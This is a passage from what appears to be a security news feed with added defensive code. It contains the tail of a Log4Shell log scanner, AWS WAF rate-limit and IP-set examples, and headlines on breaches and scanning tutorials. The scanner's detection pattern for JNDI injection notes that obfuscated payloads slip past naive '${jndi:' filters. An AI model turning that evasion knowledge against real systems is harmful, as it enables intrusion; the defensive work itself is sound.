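    return findings


# Backport releases for old JVMs that fall inside the numeric range below but
# already contain the fix (2.12.2 and 2.3.1 fixed CVE-2021-44228; later point
# releases of those lines fix the follow-up CVEs).
FIXED_BACKPORTS = {"2.3.1", "2.3.2", "2.12.2", "2.12.3", "2.12.4"}


def version_in_affected_range(version: str) -> bool:
    """Triage check for the range the article states: 2.0-beta9 through 2.14.1."""
    if version in FIXED_BACKPORTS:
        return False
    base, _, prerelease = version.partition("-")
    nums = tuple(int(part) for part in base.split("."))
    nums += (0,) * (3 - len(nums))
    if nums[0] != 2 or nums > (2, 14, 1):
        return False
    if nums[:2] == (2, 0) and prerelease.lower().startswith("beta"):
        return int(prerelease[4:] or "0") >= 9
    return True


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOGS):
        print(f"line {finding['line']}: jndi scheme={finding['scheme']} host={finding['host']}")
```

The normalisation loop matters more than the final regex: a filter that only looks for the literal string `${jndi:` misses three of the four constructed payloads. Treat the version check as triage only; the authoritative signal is the presence of a patched log4j-core on the classpath, not a version string in a manifest.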
How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used to help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/
The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper, the person who discovered the flaw, the source of the leak is [...]
The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/
The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
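Added example for the rate-based rule entry above (not the AWS post's own code): a WAFv2 rate-based rule in the shape boto3's create_web_acl/update_web_acl accepts, with a scope-down statement so that only requests to the login path count toward the limit, plus an offline evaluator that applies the same per-IP, trailing-window counting to constructed traffic. The rule name, the 100-request limit, the /login path and the traffic sample are assumptions; the evaluator approximates AWS's counting so you can reason about a limit before deploying it, and is not a substitute for the service.

```python
from collections import defaultdict, deque

# WAFv2 rule as passed to boto3 create_web_acl / update_web_acl (Rules=[...]).
# boto3 expects SearchString as bytes; the JSON/CLI form carries it base64-encoded.
RATE_LIMIT_LOGIN_RULE = {
    "Name": "RateLimitLoginByIP",          # assumed name
    "Priority": 1,
    "Action": {"Block": {}},
    "VisibilityConfig": {
        "SampledRequestsEnabled": True,
        "CloudWatchMetricsEnabled": True,
        "MetricName": "RateLimitLoginByIP",
    },
    "Statement": {
        "RateBasedStatement": {
            "Limit": 100,                   # assumed limit; tune from your own baseline
            "AggregateKeyType": "IP",
            "ScopeDownStatement": {         # only these requests count toward Limit
                "ByteMatchStatement": {
                    "FieldToMatch": {"UriPath": {}},
                    "PositionalConstraint": "STARTS_WITH",
                    "SearchString": b"/login",
                    "TextTransformations": [{"Priority": 0, "Type": "LOWERCASE"}],
                }
            },
        }
    },
}

WINDOW_SECONDS = 300  # rate-based rules count over a trailing 5-minute window


def in_scope(path: str, rule=RATE_LIMIT_LOGIN_RULE) -> bool:
    """Apply the rule's scope-down: case-insensitive prefix match on the URI path."""
    bm = rule["Statement"]["RateBasedStatement"]["ScopeDownStatement"]["ByteMatchStatement"]
    return path.lower().startswith(bm["SearchString"].decode())


def ips_over_limit(requests, rule=RATE_LIMIT_LOGIN_RULE, window=WINDOW_SECONDS):
    """requests: iterable of (unix_ts, client_ip, uri_path) in any order.
    Returns the set of IPs whose in-scope request count exceeds Limit inside
    any trailing window of `window` seconds."""
    limit = rule["Statement"]["RateBasedStatement"]["Limit"]
    per_ip = defaultdict(list)
    for ts, ip, path in requests:
        if in_scope(path, rule):
            per_ip[ip].append(ts)
    blocked = set()
    for ip, stamps in per_ip.items():
        recent = deque()
        for ts in sorted(stamps):
            recent.append(ts)
            while recent[0] <= ts - window:   # drop timestamps that left the window
                recent.popleft()
            if len(recent) > limit:
                blocked.add(ip)
                break
    return blocked


# Constructed traffic sample: one client brute-forcing the login page, one busy
# but legitimate client, and one client hammering a path the scope-down ignores.
SAMPLE_REQUESTS = (
    [(t, "203.0.113.7", "/login") for t in range(0, 120)]        # 120 logins in 2 min
    + [(t * 5, "198.51.100.9", "/login") for t in range(0, 50)]   # 50 logins in ~4 min
    + [(t, "192.0.2.33", "/") for t in range(0, 300)]             # 300 hits on /, out of scope
)

if __name__ == "__main__":
    print("would block:", ips_over_limit(SAMPLE_REQUESTS))
```

The scope-down is what makes the rule usable: without it the 300 hits on "/" would trip the limit and the login rule would become a site-wide one. Run the evaluator over a day of real access logs with candidate limits before choosing one.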
Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
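Added example for the IP set entry above (not the AWS post's own code): parse a document in the shape of the published ip-ranges.json, select one service's IPv4 or IPv6 prefixes, and compute what an AWS WAF IP set update would add and remove. The JSON excerpt is constructed from documentation ranges, not real AWS prefixes; a real run would fetch https://ip-ranges.amazonaws.com/ip-ranges.json, then call get_ip_set and pass its LockToken to update_ip_set with the full desired address list.

```python
import ipaddress
import json

# Constructed excerpt in the shape of ip-ranges.json. The prefixes are
# documentation ranges (RFC 5737 / RFC 3849), not real AWS ranges.
SAMPLE_IP_RANGES_JSON = json.dumps({
    "syncToken": "1700000000",
    "createDate": "2023-11-14-00-00-00",
    "prefixes": [
        {"ip_prefix": "192.0.2.0/24", "region": "GLOBAL", "service": "CLOUDFRONT", "network_border_group": "GLOBAL"},
        {"ip_prefix": "198.51.100.0/24", "region": "us-east-1", "service": "CLOUDFRONT", "network_border_group": "us-east-1"},
        {"ip_prefix": "198.51.100.0/24", "region": "us-east-1", "service": "AMAZON", "network_border_group": "us-east-1"},
        {"ip_prefix": "203.0.113.0/24", "region": "eu-west-1", "service": "EC2", "network_border_group": "eu-west-1"},
    ],
    "ipv6_prefixes": [
        {"ipv6_prefix": "2001:db8:1::/48", "region": "GLOBAL", "service": "CLOUDFRONT", "network_border_group": "GLOBAL"},
        {"ipv6_prefix": "2001:db8:2::/48", "region": "us-east-1", "service": "EC2", "network_border_group": "us-east-1"},
    ],
})


def service_prefixes(ip_ranges_json: str, service: str, ip_version: int):
    """Sorted, de-duplicated CIDRs for one service and IP version.
    A prefix can appear under several services (e.g. CLOUDFRONT and AMAZON),
    so filter on the service you actually want to allow."""
    doc = json.loads(ip_ranges_json)
    key, field = ("prefixes", "ip_prefix") if ip_version == 4 else ("ipv6_prefixes", "ipv6_prefix")
    cidrs = {entry[field] for entry in doc[key] if entry["service"] == service}
    return sorted(cidrs, key=ipaddress.ip_network)


def ip_set_delta(current_addresses, desired_addresses):
    """What an update would add and remove. update_ip_set replaces the whole
    Addresses list, so the caller sends desired_addresses in full together with
    the LockToken from get_ip_set; the delta is for logging and change review."""
    current, desired = set(current_addresses), set(desired_addresses)
    return {
        "add": sorted(desired - current, key=ipaddress.ip_network),
        "remove": sorted(current - desired, key=ipaddress.ip_network),
    }


if __name__ == "__main__":
    desired = service_prefixes(SAMPLE_IP_RANGES_JSON, "CLOUDFRONT", 4)
    # Pretend the IP set currently holds one stale and one still-valid prefix.
    print(ip_set_delta(["192.0.2.0/24", "203.0.113.0/24"], desired))
```

Keep IPv4 and IPv6 in separate IP sets (AWS WAF IP sets are single-version), and persist the syncToken so a scheduled run can skip work when the published document has not changed.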
AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/
How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/
Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principle of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/
Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/
Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/
Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Credits: Reuters. The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/
Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Credits: The Register. The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/
AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/
Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Credits: The Register. TCP/IP co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/
Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Credits: The Register. Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/
US officially warns China is launching cyberattacks to steal coronavirus research
Credits: CNN. The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/
There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of $10m in cyber-attack
Credits: The Register. The Norwegian Investment Fund has been swindled out of $10m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […]
The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of $10m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/
Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Credits: The Register. Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […]
The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/
Cyber-attacks hit hospital construction companies
Credits: BBC. Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […]
The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/
Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Credits: The Register. Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […]
The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Credits: The Register. Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […]
The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/
CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway), and the Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]
The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/
Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/
Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
In the previous tutorial, Vulnerability Scanning with OpenVAS 9.0 part 1, we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...]
The post Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/
Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...]
The post Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/
The Best Hacking Books 2018
One of the most popular and most asked questions since I’ve started this blog is if I can recommend some good hacking books to read for beginners and more experienced hackers and penetration testers. In this article I want to highlight some hacking books and InfoSec books that I personally liked that cover subjects such as ethical hacking, [...]
The post The Best Hacking Books 2018 appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/infosec-books/the-best-hacking-books-2018/